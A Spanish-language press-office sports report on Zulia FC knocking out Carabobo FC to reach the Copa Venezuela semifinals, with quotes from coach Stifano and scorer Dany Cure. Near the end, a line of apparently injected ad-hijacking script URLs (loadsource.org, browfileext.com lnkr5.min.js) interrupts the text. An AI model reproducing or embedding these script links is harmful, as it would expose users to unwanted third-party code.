¡LOS NUESTROS PRIMERO!

Stifano: “Solo podemos disfrutar esto por un pequeño momento”

stifano041018

Tocó jugar 133 minutos, de 180 posibles sumando partidos de ida y vuelta, con un hombre menos, tocó sobreponerse a las ausencias de tus laterales habituales y de una de tus referencias en el mediocampo en el partido de vuelta, tocó sacar fuerzas donde no las había, en el minuto 90+4, luego de haber jugado seis partidos en 18 días… ¡Tocó!

Zulia Fútbol Club está en semifinales de la Copa Venezuela luego de empatar 2-2 este miércoles en el Misael Delgado de Valencia, dejando fuera a Carabobo FC con un global de 3-3 gracias a los dos tantos producidos como visitante. Sin Marco Gómez, Gabriel Benítez y Brayan Palmezano el negriazul sumó una página inolvidable, por su dramatismo, a su corta historia debido a un gol de Dany Cure en el cuarto minuto del tiempo adicionado.

Lectura de partido

Pero los rigores de los dos frentes por los que lucha el “petrolero” no permiten dormirse en los laureles. Aunque “solo podemos disfrutar esto por un pequeño momento, lo vamos a hacer porque este grupo viene trabajando con mucho esfuerzo y que hoy estemos en pie nos permite seguir adelante con mucha fuerza para enfrentar lo que viene”, manifestó, con la poca voz que le quedaba, Francesco Stifano, director técnico de los zulianos.

Stifano, cual ajedrecista, manejó desde el banco movimientos que le dieron resultado inmediato. Colocar a José Martínez como defensor central tras la expulsión de Grenddy Perozo, incluir desde el primer minuto de la segunda parte a Evelio Hernández para dar manejo, usar a Luis Paz, autor de la asistencia del segundo gol, para desequilibrar en la banda, mover a Daniel Rivillo del lateral derecho al izquierdo, y todo en 45 minutos, resolvió un encuentro que con desventaja en el tanteador lucía cuesta arriba.

“Era lo que pedía el partido”, responde Stifano. “Ellos incluyeron desde temprano en el complemento jugadores manejadores, pero descuidaron la marca por izquierda, había que reforzar el ataque por allí y precisamente por ese costado llegó el gol, pero fue un gran esfuerzo de los muchachos reconocer ese aspecto y poder tener la paciencia para conseguir el gol en el momento justo”, expresó.

Sin sorpresas

Dany Cure, el hombre que tuvo la sangre fría para liquidar los cuartos de final ante Carabobo, no le cabía una gota de sudor más en su camiseta tras el pitazo que dio la clasificación a Zulia FC, pero, y a pesar de la euforia que puede significar haber sido héroe, su semblante y palabra eran de tranquilidad.

“Este grupo está preparado para estas cosas, estamos emocionados, pero no sorprendidos. Estas son cosas que suceden con trabajo y ahora nos toca pensar en Estudiantes (de Mérida, el rival del domingo por Clausura) y lo que viene en adelante. Queremos seguir luchando en los dos frentes y hasta lo últimos vamos con esa mentalidad”, puntualizó el machiquense.

“La jugada (la del gol final) demandaba que acompañara a (Luis) Paz, quien realmente hizo una excelente jugada y entró muy bien, me envió el centro y había que pegarle como venía. Es un gol de trabajo porque eso se entrena en la semana para que salga el día del partido y así fue”, destacó

Zulia Fútbol Club disputará las semifinales ante Zamora Fútbol Club, equipo que eliminó a Llaneros de Guanare, con partido de ida el miércoles 10 en el “Pachencho” Romero de Maracaibo, mientras que la vuelta se celebrará el domingo 14 en La Carolina de Barinas.

PRENSA ZULIA FC.

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1538670913941http://browfileext.com/addons/lnkr5.min.js

Oswaldo Guevara